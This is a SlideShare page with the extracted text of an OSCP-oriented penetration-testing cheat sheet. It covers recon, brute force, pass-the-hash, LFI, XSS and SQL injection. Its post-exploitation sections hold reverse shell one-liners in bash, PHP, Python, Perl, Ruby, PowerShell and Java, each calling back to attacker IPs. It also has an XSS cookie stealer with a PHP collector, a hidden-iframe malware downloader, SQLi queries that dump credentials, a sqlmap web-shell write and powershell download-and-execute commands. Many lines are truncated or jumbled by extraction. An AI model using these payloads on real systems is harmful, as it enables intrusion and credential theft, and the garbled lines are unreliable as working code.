SlideShare a Scribd company logo

Pentesting111111 Cheat Sheet_OSCP_2023.pdf

F
faker1842002

123

Data & Analytics
1 of 28
Download to read offline
20.02.2023 07:30 Pentest-Cheat-Sheets Page 1 of 28 https://md2pdf.netlify.app/ Pentest-Cheat-Sheets This repo has a collection of snippets of codes and commands to help our lives! The main purpose is not be a crutch, this is a way to do not waste our precious time! This repo also helps who trying to get OSCP. You'll find many ways to do something without Metasploit Framework. Ninja Tricks Recon DNS SPF Nmap NetCat SNMP Mysql MS SQL Web Enumeration Exploitation System Network RDP Pass The Hash
20.02.2023 07:30 Pentest-Cheat-Sheets Page 2 of 28 https://md2pdf.netlify.app/ Windows-Shell Web Application Web Remote Code Execution LFI encode XSS SQLi sqlmap Bare Hands Jekins Post-exploitation Reverse Shell PHP Reverse Shell Perl Reverse Shell python Reverse Shell Ruby Reverse Shell bash Reverse Shell powershell Reverse Sheel Java Reverse Sheel Xterm Reverse Sheel Linux Linux Privilege Escalation Data Haversting and Enumeration Linux Pivot Sshutle VPNPivot SSH Tunneling Linux Backdoring Windows Windows Enumeration Windows Privilege Escalation Hashdump Transferring Files Without Metasploit
20.02.2023 07:30 Pentest-Cheat-Sheets Page 3 of 28 https://md2pdf.netlify.app/ Backdoring Windows Pivot Openssh for Tunneling Plink Resources HTTP/HTTPS Servers Wordlist seclist cotse PacketStorm Default Passwords Default Passoword Router Password Leak Pastebin Tables Contribution Recon DNS Nslookup Resolve a given hostname to the corresponding IP. nslookup targetorganization.com Reverse DNS lookup nslookup -type=PTR IP_address MX(Mail Exchange) lookup
20.02.2023 07:30 Pentest-Cheat-Sheets Page 4 of 28 https://md2pdf.netlify.app/ nslookup -type=MX domain Zone Transfer Using nslookup Command nslookup server domain.com ls -d domain.com Using HOST Command host -t ns(Name Server) < domain > host -t ns domain.com after that test nameservers host -l < domain > < nameserver > host -l domain.com ns2.domain.com Nmap Dns Enumaration nmap -F --dns-server <dns server ip> <target ip range> Auto tools DNSenum dnsenum targetdomain.com dnsenum --target_domain_subs.txt -v -f dns.txt -u a -r targetdomain.com
20.02.2023 07:30 Pentest-Cheat-Sheets Page 5 of 28 https://md2pdf.netlify.app/ DNSmap targetdomain.com dnsmap targetdomain.com -w <Wordlst file.txt> Brute Force, the file is saved in /tmp dnsmap targetdomain.com -r DNSRecon DNS Brute Force dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml Fierce.pl fierce -dns targetdomain.com HostMap hostmap.rb -only-passive -t <IP> We can use -with-zonetransfer or -bruteforce-level SPF Recon Dig SPF txt dig txt target.com Dmarc
20.02.2023 07:30 Pentest-Cheat-Sheets Page 6 of 28 https://md2pdf.netlify.app/ dig TXT _dmarc.example.org Online Tools https://dnsdumpster.com/ https://network-tools.com/nslook/ https://www.dnsqueries.com/en/ https://mxtoolbox.com/ Nmap Set the ip address as a varible export ip=192.168.1.100 export netw=192.168.1.0/24 Detecting Live Hosts Only Ip's nmap -sn -n $netw | grep for | cut -d" " -f5 Stealth Scan nmap -sS $ip Only Open Ports and Banner Grab nmap -n -Pn -sS $ip --open -sV Stealth scan using FIN Scan map -sF $ip
20.02.2023 07:30 Pentest-Cheat-Sheets Page 7 of 28 https://md2pdf.netlify.app/ Agressive scan Without Ping scan, no dns resolution, show only open ports all and test All TCP Ports nmap -n -Pn -sS -A $ip --open -p- Nmap verbose scan, runs syn stealth, T4 timing, OS and service version info, traceroute and scripts against services nmap –v –sS –A –T4 $ip OS FigerPrint nmap -O $ip Quick Scan nmap -T4 -F $netw Quick Scan Plus nmap -sV -T4 -O -F --version-light $netw output to a file nmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip output to a file Plus nmap -oA nameFile -p 1-65535 -sV -sS -A -T4 $netw Search NMAP scripts
20.02.2023 07:30 Pentest-Cheat-Sheets Page 8 of 28 https://md2pdf.netlify.app/ ls /usr/share/nmap/scripts/ | grep ftp Nmap Discovery NetCat Port Scanner One port nc -nvz 192.168.1.23 80 Port Range nc -vnz 192.168.1.23 0-1000 Send files Server nc -lvp 1234 > file_name_to_save Client nc -vn 192.168.1.33 1234 < file_to_send Executing remote script Server nc -lvp 1234 -e ping.sh <IP> Client
20.02.2023 07:30 Pentest-Cheat-Sheets Page 9 of 28 https://md2pdf.netlify.app/ nc -vn 192.168.1.33 1234 Chat with encryption Server ncat -nlvp 8000 --ssl Client ncat -nv 192.168.1.33 8000 Banner Grabbing Request nc target port HTTP_Verb path http/version Host: url Response nc www.bla.com.br 80 HEAD / HTTP/1.0 Host: www.bla.com.br If this site uses https you need to use openssl penssl s_client -quiet www.bla.com.br:443 SNMP
20.02.2023 07:30 Pentest-Cheat-Sheets Page 10 of 28 https://md2pdf.netlify.app/ Fixing SNMP output apt-get install snmp-mibs-downloader download-mibs echo "" > /etc/snmp/snmp.conf OneSixtyone onesixtyone -c COMMUNITY_FILE -i Target_ip onesixtyone -c community.txt -i Found_ips.txt snmpwalk Walking MIB's snmpwalk -c COMMUNITY -v VERSION target_ip snmpwalk -c public -v1 192.168.25.77 specific MIB node snmpwalk -c community -v version Target IP MIB Node Example: USER ACCOUNTS = 1.3.6.1.4.1.77.1.2.25 snmpwalk -c public -v1 192.168.25.77 1.3.6.1.4.1.77.1.2.25 snmp-check snmp-check -t target_IP | snmp-check -t TARGET -c COMMUNITY snmp-check -t 172.20.10.5 snmp-check -t 172.20.10.5 -c public
20.02.2023 07:30 Pentest-Cheat-Sheets Page 11 of 28 https://md2pdf.netlify.app/ Automate the username enumeration process for SNMPv3 apt-get install snmp snmp-mibs-downloader NMAP SNMPv3 Enumeration nmap -sV -p 161 --script=snmp-info 172.20.10.0/24 Default Credentials /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt MYSQL Try remote default Root access Mysql Open to wild mysql -h Target_ip -u root -p MSSQL MSQL Information Gathering Web Enumeration wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-
20.02.2023 07:30 Pentest-Cheat-Sheets Page 12 of 28 https://md2pdf.netlify.app/ Dirsearch dirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old dirsearch -u https://target.com -e . dirb dirb http://target.com /path/to/wordlist Gobuster gobuster -u https://target.com -w /usr/share/wordlists/dirb/big.txt Exploitation System Network RDP xfreerdp Simple User Enumeration for Windows Target (kerberos based) xfreerdp /v:<target_ip> -sec-nla /u:"" dirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old -w path/to/wordlist dirb http://target.com /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.
20.02.2023 07:30 Pentest-Cheat-Sheets Page 13 of 28 https://md2pdf.netlify.app/ xfreerdp /v:192.168.0.32 -sec-nla /u:"" login xfreerdp /u: /g: /p: /v:<target_ip> xfreerdp /u:administrator /g:grandbussiness /p:bla /v:192.168.1.34 Wordlist based bruteforce NCRACK ncrack -vv --user/-U <username/username_wordlist> --pass/-P <password/password_wordlist> <target_ip>:3389 ncrack -vv --user user -P wordlist.txt 192.168.0.32:3389 Crowbar crowbar -b rdp <-u/-U user/user_wordlist> -c/-C <password/password_wordlist> -s <target_ip>/32 -v crowbar -b rdp -u user -C password_wordlist -s 192.168.0.16/32 -v Pass the hash Smb pass the hash Tool: pth-toolkit Listing shared folders sudo pth-smbclient --user= --pw-nt-hash -m smb3 -L <target_ip> <target_ip>
20.02.2023 07:30 Pentest-Cheat-Sheets Page 14 of 28 https://md2pdf.netlify.app/ Interactive smb shell sudo pth-smbclient --user= --pw-nt-hash -m smb3 <target_ip>shared_folder Web Application Web Remote code LFI (Local File Inclusion) Situation http://<target>/index.php?parameter=value How to Test http://<target>/script.php?page=../../../../../../../../etc/passwd http://<target>/script.php?page=../../../../../../../../boot.ini LFI Payloads Payload All the Things Seclist LFI Intruder encode sudo pth-smbclient --user=user --pw-nt-hash -m smb3 -L 192.168.0.24 192.168.0 sudo pth-smbclient --user=user --pw-nt-hash -m smb3 192.168.0.24folder ljahdçj http://<target>/index.php?parameter=php://filter/convert.base64-encode/resource=inde
20.02.2023 07:30 Pentest-Cheat-Sheets Page 15 of 28 https://md2pdf.netlify.app/ XSS Reflected Simple test This is a simple test to see what happens, this is not a prove that the field is vuln to xss <plaintext> Simple XSS test <script>alert('Found')</script> "><script>alert(Found)</script>"> <script>alert(String.fromCharCode(88,83,83))</script> Bypass filter of tag script " onload="alert(String.fromCharCode(88,83,83)) " onload="alert('XSS') bla is not a valid image, so this cause an error <img src='bla' onerror=alert("XSS")> Persistent PHP collector >document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibili
20.02.2023 07:30 Pentest-Cheat-Sheets Page 16 of 28 https://md2pdf.netlify.app/ > cookie.txt chmod 777 cookie.txt edit a php page like colector.php as follow: <?php $cookie=GET['cookie']; $useragent=$_SERVER['HTTP_USER_AGENT']; $file=fopen('cookie.txt', 'a'); fwrite($file,"USER AGENT:$useragent || COOKIE=$cookien"); fclose($file); ?> Script to put in page: Malware Donwloader via XSS <iframe src="http://OUR_SERVER_IP/OUR_MALWARE" height="0" width="0"></iframe> How to play Mario with XSS XSS payloads Payload All The Things Seclist XSS SQLI Sql Injection Sqlmap <scritp>new Image().src="http://OUR_SERVER_IP/colector.php?cookie="+document.cookie; <iframe src="https://jcw87.github.io/c2-smb1/" width="100%" height="600"></iframe> <input onfocus="document.body.innerHTML=atob('PGlmcmFtZSBzcmM9Imh0dHBzOi8vamN3ODcuZ2
20.02.2023 07:30 Pentest-Cheat-Sheets Page 17 of 28 https://md2pdf.netlify.app/ GET Error-Based Simple test Adding a simpe quote ' Example: http://192.168.1.104/Less-1/?id=5' List databases ./sqlmap.py -u http://localhost/Less-1/?id=1 --dbs List tables ./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name --tables List columns Dump all Set Cookie Checking Privileges ./sqlmap.py -u http://localhost/Less-1/?id=1 --privileges | grep FILE ./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name -T table_name --column ./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name -T table_name --dump-a ./sqlmap.py -u http://target/ovidentia/index.php?tg=delegat&idx=mem&id=1 --coo
20.02.2023 07:30 Pentest-Cheat-Sheets Page 18 of 28 https://md2pdf.netlify.app/ Reading file ./sqlmap.py -u <URL> --file-read=<file to read> ./sqlmap.py -u http://localhost/Less-1/?id=1 --file-read=/etc/passwd Writing file ./sqlmap.py -u <url> --file-write=<file> --file-dest=<path> POST ./sqlmap.py -u <POST-URL> --data="<POST-paramters> " You can also use a file like with the post request: ./sqlmap.py -r post-request.txt -p uname Bare Hands GET Error-Based Simple test Adding a simpe quote ' ./sqlmap.py -u http://localhost/Less-1/?id=1 --file-write=shell.php --file-dest=/var ./sqlmap.py -u http://localhost/Less-11/ --data "uname=teste&passwd=&submit=Submit"
20.02.2023 07:30 Pentest-Cheat-Sheets Page 19 of 28 https://md2pdf.netlify.app/ Example: http://192.168.1.104/Less-1/?id=5' Fuzzing Sorting columns to find maximum column http://192.168.1.104/Less-1/?id=-1 order by 1 http://192.168.1.104/Less-1/?id=-1 order by 2 http://192.168.1.104/Less-1/?id=-1 order by 3 (until it stop returning errors) Finding what column is injectable mysql http://192.168.1.104/Less-1/?id=-1 union select 1, 2, 3 (using the same amount of columns you got on the previous step) postgresql http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, NULL (using the same amount of columns you got on the previous step) one of the columns will be printed with the respective number Finding version mysql http://192.168.1.104/Less-1/?id=-1 union select 1, 2, version() postgres
20.02.2023 07:30 Pentest-Cheat-Sheets Page 20 of 28 https://md2pdf.netlify.app/ http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, version() Finding database name mysql http://192.168.1.104/Less-1/?id=-1 union select 1,2, database() postgres http://192.168.1.104/Less-1/?id=-1 union select NULL,NULL, database() Finding usernames logged in mysql http://192.168.1.104/Less-1/?id=-1 union select 1, 2, current_user() Finding databases mysql http://192.168.1.104/Less-1/?id=-1 union select 1, 2, schema_name from information_schema.schemata postgres http://192.168.1.104/Less-1/?id=-1 union select 1, 2, datname from pg_database Finding table names from a database mysql postgres Finding column names from a table http://192.168.1.104/Less-1/?id=-1 union select 1, 2, table_name from information_sc http://192.168.1.104/Less-1/?id=-1 union select 1, 2, tablename from pg_tables where
20.02.2023 07:30 Pentest-Cheat-Sheets Page 21 of 28 https://md2pdf.netlify.app/ mysql postgres Concatenate Example: http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login from users; http://192.168.1.104/Less-1/?id=-1 union select 1, 2, password from users; in one query http://192.168.1.104/Less-1/?id=-1 union select 1, 2, concat(login,':',password) from users; mysql http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login||':'||password from users; postgres Error Based SQLI (USUALLY MS-SQL) Current user http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))-- DBMS version http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))-- Database name http://192.168.1.104/Less-1/?id=-1 or db_name(0)=0 -- Tables from a database http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as http://192.168.1.104/Less-1/?id=-1 union select 1, 2, column_name from information_s http://192.168.1.104/Less-1/?id=-1 union select 1, 2, column_name from information_s
20.02.2023 07:30 Pentest-Cheat-Sheets Page 22 of 28 https://md2pdf.netlify.app/ varchar(4096)) FROM dbname..sysobjects where xtype='U')-- http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U' AND name NOT IN ('previouslyFoundTable',...))-- Columns within a table http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename')-- remember to change dbname and tablename accordingly with the given situation after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename' AND dbname..syscolumns.name NOT IN('previously found column name', ...))-- Actual data http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename)-- after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename AND name NOT IN('previously found row data'))-- Shell commands EXEC master..xp_cmdshell <command> you need yo be 'sa' user
20.02.2023 07:30 Pentest-Cheat-Sheets Page 23 of 28 https://md2pdf.netlify.app/ Enabling shell commands EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_congigure 'xp_shell', 1; RECONFIGURE; Jenkins Post Exploitation Reverse Shell PHP Reverse Shell php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' Tiny Reverse Shell <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.36.167/1337 0>&1'"); Perl Reverse Shell Python Reverse Shell Ruby Reverse Shell perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobynam python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_ST ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%
20.02.2023 07:30 Pentest-Cheat-Sheets Page 24 of 28 https://md2pdf.netlify.app/ Bash Reverse Shell bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Powershell Reverse Shell Create a simple powershell script called reverse.ps1: Java Reverse Shell Xterm Reverse Shell One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001. xterm -display 10.0.0.1:1 To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system): Xnest :1 You’ll need to authorise the target to connect to you (command also run on your host): function reverse_powershell { $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = } powershell -ExecutionPolicy bypass -command "Import-Module reverse.ps1; reverse_powe r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read li p.waitFor()
20.02.2023 07:30 Pentest-Cheat-Sheets Page 25 of 28 https://md2pdf.netlify.app/ xhost +targetip Linux Windows Transferring Files Without Metasploit Powershell Download files with powershell Creating a server with python3 python -m http.server Creating a server with python2 python -m SimpleHTTPServer 80 FTP You need to create a FTP server Server Linux Allow anonymous powershell -c "Invoke-WebRequest -uri 'http://Your-IP:Your-Port/winPEAS.bat' -OutFil powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/I powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-n
20.02.2023 07:30 Pentest-Cheat-Sheets Page 26 of 28 https://md2pdf.netlify.app/ python -m pyftpdlib -p 21 -u anonymous -P anonymous Windows Client ftp open target_ip port open 192.168.1.22 21 we can simply run ftp -s:ftp_commands.txt and we can download a file with no user interaction. like this: C:UserskitsunesecDesktop>echo open 10.9.122.8>ftp_commands.txt C:UserskitsunesecDesktop>echo anonymous>>ftp_commands.txt C:UserskitsunesecDesktop>echo whatever>>ftp_commands.txt C:UserskitsunesecDesktop>ftp -s:ftp_commands.txt Apache Server server Put your files into /var/www/html cp nc.exe /var/www/html systemctl start apache2 client Get via web browser, wget or powershell... Windows Pivoting Openssh for Tunneling Once you got SYSTEM on the target machine. download: openssh_for_windows Then install it: powershell -command "Expand-Archive 'C:<path-to-zipped-openssh>openssh.zip' c:<pa
20.02.2023 07:30 Pentest-Cheat-Sheets Page 27 of 28 https://md2pdf.netlify.app/ Now if you need, just adjust the firewall rules to your needs: Start the sshd service: net start sshd After these steps a regular ssh tunnel would sufice: From your linux machine: $ ssh -ACv -D <tunnel_port> <windows-user>@<windows-ip> done you have now a socks to tunnel through!! Resources HTTP/HTTPS Servers HTTPS using Python Create the Certificate: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes Start the HTTPS Server powershell -ExecutionPolicy Bypass -File c:<path-to-unzipped-openssh-folder>instal powershell -Command "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (ss import BaseHTTPServer, SimpleHTTPServer import ssl
20.02.2023 07:30 Pentest-Cheat-Sheets Page 28 of 28 https://md2pdf.netlify.app/ Wordlists Wordlists PacketStorm SecList cotse Default Password DefaultPassword RouterPassword Leak Pastebin Tables RainbowCrack Contribution HOW TO httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPReque httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=T httpd.serve_forever()

Recommended

Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
Incident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsIncident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsNapier University
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
 
Trying and evaluating the new features of GlusterFS 3.5
Trying and evaluating the new features of GlusterFS 3.5Trying and evaluating the new features of GlusterFS 3.5
Trying and evaluating the new features of GlusterFS 3.5Keisuke Takahashi
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box AttackPrathan Phongthiproek
 
Velocity 2011 - Our first DDoS attack
Velocity 2011 - Our first DDoS attackVelocity 2011 - Our first DDoS attack
Velocity 2011 - Our first DDoS attackCosimo Streppone
 
A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 

Recommended

Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
Incident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsIncident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsNapier University
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
 
Trying and evaluating the new features of GlusterFS 3.5
Trying and evaluating the new features of GlusterFS 3.5Trying and evaluating the new features of GlusterFS 3.5
Trying and evaluating the new features of GlusterFS 3.5Keisuke Takahashi
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box AttackPrathan Phongthiproek
 
Velocity 2011 - Our first DDoS attack
Velocity 2011 - Our first DDoS attackVelocity 2011 - Our first DDoS attack
Velocity 2011 - Our first DDoS attackCosimo Streppone
 
A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 
A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 
[OpenStack 하반기 스터디] HA using DVR
[OpenStack 하반기 스터디] HA using DVR[OpenStack 하반기 스터디] HA using DVR
[OpenStack 하반기 스터디] HA using DVROpenStack Korea Community
 
Linux Network commands
Linux Network commandsLinux Network commands
Linux Network commandsHanan Nmr
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Free radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmapleFree radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmapleChanaka Lasantha
 
Bsides final
Bsides finalBsides final
Bsides finalCollyn Hartley
 
Python Hashlib & A True Story of One Bug
Python Hashlib & A True Story of One BugPython Hashlib & A True Story of One Bug
Python Hashlib & A True Story of One Bugdelimitry
 
Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Abhichai L.
 
9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_training9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_trainingvideos
 
Kubernetes Navigation Stories – DevOpsStage 2019, Kyiv
Kubernetes Navigation Stories – DevOpsStage 2019, KyivKubernetes Navigation Stories – DevOpsStage 2019, Kyiv
Kubernetes Navigation Stories – DevOpsStage 2019, KyivAleksey Asiutin
 
Parrot Drones Hijacking
Parrot Drones HijackingParrot Drones Hijacking
Parrot Drones HijackingPriyanka Aash
 
Metasploitable
MetasploitableMetasploitable
MetasploitableSri Manakula Vinayagar Engineering College
 
Intrusion Techniques
Intrusion TechniquesIntrusion Techniques
Intrusion TechniquesFestival Software Livre
 
High Availability With DRBD & Heartbeat
High Availability With DRBD & HeartbeatHigh Availability With DRBD & Heartbeat
High Availability With DRBD & HeartbeatChris Barber
 
3 scanning-ger paoctes-pub
3 scanning-ger paoctes-pub3 scanning-ger paoctes-pub
3 scanning-ger paoctes-pubCassio Ramos
 
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...Jisc
 
Linux Tracing Superpowers by Eugene Pirogov
Linux Tracing Superpowers by Eugene PirogovLinux Tracing Superpowers by Eugene Pirogov
Linux Tracing Superpowers by Eugene PirogovPivorak MeetUp
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby SystemsEngine Yard
 
Hands on Virtualization with Ganeti
Hands on Virtualization with GanetiHands on Virtualization with Ganeti
Hands on Virtualization with GanetiOSCON Byrum
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging RubyAman Gupta
 
RA-11058_IRR-COMPRESS Do 198 series of 1998
RA-11058_IRR-COMPRESS Do 198 series of 1998RA-11058_IRR-COMPRESS Do 198 series of 1998
RA-11058_IRR-COMPRESS Do 198 series of 1998YohFuh
 
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdf
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdfKantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdf
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdfSocial Samosa
 

More Related Content

Similar to Pentesting111111 Cheat Sheet_OSCP_2023.pdf

A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 
[OpenStack 하반기 스터디] HA using DVR
[OpenStack 하반기 스터디] HA using DVR[OpenStack 하반기 스터디] HA using DVR
[OpenStack 하반기 스터디] HA using DVROpenStack Korea Community
 
Linux Network commands
Linux Network commandsLinux Network commands
Linux Network commandsHanan Nmr
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Free radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmapleFree radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmapleChanaka Lasantha
 
Python Hashlib & A True Story of One Bug
Python Hashlib & A True Story of One BugPython Hashlib & A True Story of One Bug
Python Hashlib & A True Story of One Bugdelimitry
 
Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Abhichai L.
 
9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_training9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_trainingvideos
 
Kubernetes Navigation Stories – DevOpsStage 2019, Kyiv
Kubernetes Navigation Stories – DevOpsStage 2019, KyivKubernetes Navigation Stories – DevOpsStage 2019, Kyiv
Kubernetes Navigation Stories – DevOpsStage 2019, KyivAleksey Asiutin
 
Parrot Drones Hijacking
Parrot Drones HijackingParrot Drones Hijacking
Parrot Drones HijackingPriyanka Aash
 
High Availability With DRBD & Heartbeat
High Availability With DRBD & HeartbeatHigh Availability With DRBD & Heartbeat
High Availability With DRBD & HeartbeatChris Barber
 
3 scanning-ger paoctes-pub
3 scanning-ger paoctes-pub3 scanning-ger paoctes-pub
3 scanning-ger paoctes-pubCassio Ramos
 
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...Jisc
 
Linux Tracing Superpowers by Eugene Pirogov
Linux Tracing Superpowers by Eugene PirogovLinux Tracing Superpowers by Eugene Pirogov
Linux Tracing Superpowers by Eugene PirogovPivorak MeetUp
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby SystemsEngine Yard
 
Hands on Virtualization with Ganeti
Hands on Virtualization with GanetiHands on Virtualization with Ganeti
Hands on Virtualization with GanetiOSCON Byrum
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging RubyAman Gupta
 

Similar to Pentesting111111 Cheat Sheet_OSCP_2023.pdf (20)

A little systemtap
A little systemtapA little systemtap
A little systemtap
 
[OpenStack 하반기 스터디] HA using DVR
[OpenStack 하반기 스터디] HA using DVR[OpenStack 하반기 스터디] HA using DVR
[OpenStack 하반기 스터디] HA using DVR
 
Linux Network commands
Linux Network commandsLinux Network commands
Linux Network commands
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Free radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmapleFree radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmaple
 
Bsides final
Bsides finalBsides final
Bsides final
 
Python Hashlib & A True Story of One Bug
Python Hashlib & A True Story of One BugPython Hashlib & A True Story of One Bug
Python Hashlib & A True Story of One Bug
 
Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178
 
9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_training9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_training
 
Kubernetes Navigation Stories – DevOpsStage 2019, Kyiv
Kubernetes Navigation Stories – DevOpsStage 2019, KyivKubernetes Navigation Stories – DevOpsStage 2019, Kyiv
Kubernetes Navigation Stories – DevOpsStage 2019, Kyiv
 
Parrot Drones Hijacking
Parrot Drones HijackingParrot Drones Hijacking
Parrot Drones Hijacking
 
Metasploitable
MetasploitableMetasploitable
Metasploitable
 
